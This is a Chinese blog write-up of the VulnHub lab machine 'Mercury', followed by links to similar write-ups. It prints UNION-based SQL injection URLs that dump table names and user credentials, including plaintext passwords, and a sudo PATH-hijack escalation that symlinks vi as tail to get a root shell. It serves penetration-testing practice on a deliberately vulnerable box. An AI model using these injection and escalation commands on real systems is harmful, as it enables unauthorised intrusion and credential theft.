vulnhub-Mercury

最新推荐文章于 2024-09-03 19:59:00 发布
最新推荐文章于 2024-09-03 19:59:00 发布
阅读量646 收藏
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yutianovo/article/details/108835320
版权

靶机描述

Difficulty: Easy

Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com

下载 https://www.vulnhub.com/entry/the-planets-mercury,544/

清单

  • 信息搜集

    • netdiscover
    • nmap

  • 利用

    • sql注入

  • 提权

    • sudo

信息搜集

靶机IP

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5uRAiFrP-1601208030462)(http://do.yutian233.xyz/image-20200927194449462.png)]

端口扫描

nmap -sS -sV -p- 192.168.0.112

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2

8080

由python 搭建

image-20200927194657001

当访问时 http://192.168.0.112:8080/1

可以看出给出了目录 mercuryfacts

mercuryfacts

image-20200927194812953

存在sql注入

http://192.168.0.112:8080/mercuryfacts/88888  union select group_concat(table_name) from information_schema.tables where table_schema=database()
(('facts,users',),)


http://192.168.0.112:8080/mercuryfacts/88888 union select group_concat(column_name) from information_schema.columns where table_name='users'
 (('id,password,username',),)


http://192.168.0.112:8080/mercuryfacts/88888 union select group_concat(id,password,username) from users
(('1johnny1987john,2lovemykids111laura,3lovemybeer111sam,4mercuryisthesizeof0.056Earthswebmaster',),)

使用 webmaster mercuryisthesizeof0.056Earths 来登录

webmaster

mg-wmr5YIgO-1601208030481

拿到shell 来到 notes.txt

得到用户 linuxmaster 用户的密码

linuxmaster

提权方法来自

image-20200927195638823

ln -s /bin/vi tail
export PATH=.:$PATH
sudo -u root --preserve-env=PATH /usr/bin/check_syslog.sh

:/bin/bash

root

image-20200927195559377

vulnhub吧唧——THE PLANETS: MERCURY
xstlikeja的博客
07-15 266
这里我们sudo -l列出所有可以执行的命令和权限时,发现sudo允许用户以root权限来执行一个shell脚本,并为当前用户配置了SETENV,简直就是瞌睡来了遇到枕头了,这个shell脚本的意思就是利用tail(显示文本末尾行的内容)命令显示/var/log/syslog(系统日志文件)最后十行的内容,作为一个weber,我敏锐的嗅觉告诉我,这个shell脚本一定有问题,果不其然,沉淀之后的我就是不一样,一眼就看出(经过高人指点)这个tail不是绝对路径,所以我们可以在这里做下文章。
Mercury 靶机 wp
m0_52496313的博客
10-08 533
Mercury 靶机 wp
vulnhub-The Planets: Mercury
qq_43006864的博客
06-02 984
The Planets: Mercury ~ VulnHub靶机:攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集:nmap 192.168.1.1/24进一步探测端口信息nmap -sS -sV -A -p- 192.168.1.114访问一下8080端口,说是你好此网站目前正在开发中,请稍后再查看。随便访问一下错误页面。 给了三个提示。indexrobots.t
vulnhub靶机mercury
weixin_53665747的博客
07-17 177
靶机整体简单,没什么难度。
vulnhub The Planets: Mercury
箭雨镜屋
03-30 845
nmap扫描 ---- 从404页面获取网站路径 ---- sql注入获取系统用户名和密码 ---- base64解码得到另一个系统用户密码 ---- sudo SETENV提权
vulnhub靶场——THE PLANETS: MERCURY
Czheisenberg的博客
02-12 2766
vulnhub靶场——THE PLANETS: MERCURY
project-mercury-config:项目-mercury 性能测试服务器的配置存储库
06-17
项目-mercury-config project-mercury 性能测试服务器的配置 repo 参见: : Fork 这个 repo 用于你自己的项目-mercury 服务器,在私有 repo 中给它一个外部配置
hl-mercury:Hashgraph实现类似于Hyperledger的功能
04-26
关于hl-mercury项目 该项目的目标是将哈希图共识算法的优势引入Hyperledger。 我们是一个由软件开发人员,工程师和技术人员组成的全球分布团队,他们对未来充满好奇,对下一代DLT技术充满热情,并希望将分布式共识...
java后端源码-mercury:Mercury逻辑编程系统
06-05
Mercury 编译器有许多不同的版本,可在不同的操作系统上运行。 具体信息包含在各个 README 文件中: 讨论如何安装 Mercury。 这很重要,因为 Mercury 编译器是用 Mercury 编写的。 C 低级后端 此后端适用于 GCC,但...
atom-mercury:Mercury 的 Atom 包
06-26
Atom Mercury 包是一款专为 Mercury 语言设计的集成开发环境(IDE)扩展,它为 Atom 编辑器提供了丰富的语法高亮、代码提示和编辑支持。这个包是基于 CoffeeScript 开发的,CoffeeScript 是一种简洁、优雅的 ...
ISD-MERCURY-INFOSCAPE:与存储在INFOCENTRAL服务器上的数据进行交互的应用程序
05-10
ISD-MERCURY-INFOSCAPE 是一个应用程序,它专门设计用于与INFOCENTRAL服务器上的数据进行交互。INFOCENTRAL服务器通常作为一个中央存储库,用于管理和组织各种类型的信息,包括文件、文档、数据库记录等。这个应用...
红队打靶:THE PLANETS: MERCURY打靶思路详解(vulnhub
Bossfrank的博客
09-29 1556
本文是vulnhub靶机THE PLANETS: MERCURY的详细打靶过程。靶机不难,但体现了渗透的常见思维方式。打靶过程有一种按图索骥的感觉,非常有逻辑的思考。当我们目录爆破没什么思路的时候,可以在url中尝试错误的路径,尝试是否有报错的回显提示信息。特别关注url的信息,可能存在遍历和sql注入,此外,本文提权的思路与逻辑也需要读者深入理解。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury
Aluxian_的博客
07-09 1037
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度中等吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.sqlmap基本使用这里就不讲了DC3有写或者别的文章也有讲,ssh-keygen得登入!3.漏洞得利用(漏洞很强大!4.(环境变量)提权得学习!
Vulnhud-行星系列:Mercury(水星)教学
最新发布
qq_73413340的博客
09-03 1246
靶机使用了arp做目标扫描发现目标地址是192.168.195.131,之后使用nmap对目标地址做了端口扫描发现目标主机开放了22端口、8080端口,站点探测发现没有什么有用的信息然后做了目录爆破但是没有什么收获接着利用报错信息发现一个目录接着在发现的目录中的Load fact链接发现了sql注入漏洞,接着利用sqmap使用脱库发现一个用户密码表并且存在明文,然后使用ssh远程登录了并且在当前文件发现了第一个flag然后在另一个文件夹中发现有一个txt文件,打开发现有两个账户跟密码经过base64解码得出
xing-vulnhub-mercury靶场#渗透测试
chinese_cabbage0的博客
01-31 1026
此笔记本是个人笔记,所有看起来并不是很详细,所以大家见谅。后续发布的靶场wp我会通过截图,等其他方法让大家更好的理解,学习!
mercury靶机
woshicainiao666的博客
01-10 1080
不与伪君子争名,不与真小人争利,不与执拗人争理,不与匹夫争勇,不与酸儒争才。不与蠢人施恩。
mercury(--preserver-env提权)
m0_66299232的博客
10-13 833
最关键的一点是.sh文件的执行主要靠syslog的运行 而tail这个命令,他又只显示最后十行,我们又要利用tail,所以软连接vi 用vi来中断执行达到提权目的。5.cat一下这个.sh文件 发现他是用tail ,tail -n 10 /var/log/syslog是显示syslog文件最后十行,2.sudo -l 需要进行输入密码 这是没有sudo权限 然后进行ls -l /home 查看家目录下文件。sudo --preserve-env=PATH /usr/bin/check_syslog.sh
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets Mercury_mercury 靶场
2401_84788430的博客
05-12 518
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新需要这份系统化的资料的朋友,可以戳这里获取渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103 开启了和端口老样子先访问,说还在开发中直接扫后台 扫到了一个进行访问,得到三个路径分别访问! 这里点进去我们可以
The Planets:Venus
weixin_44770698的博客
01-08 1117
靶场练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值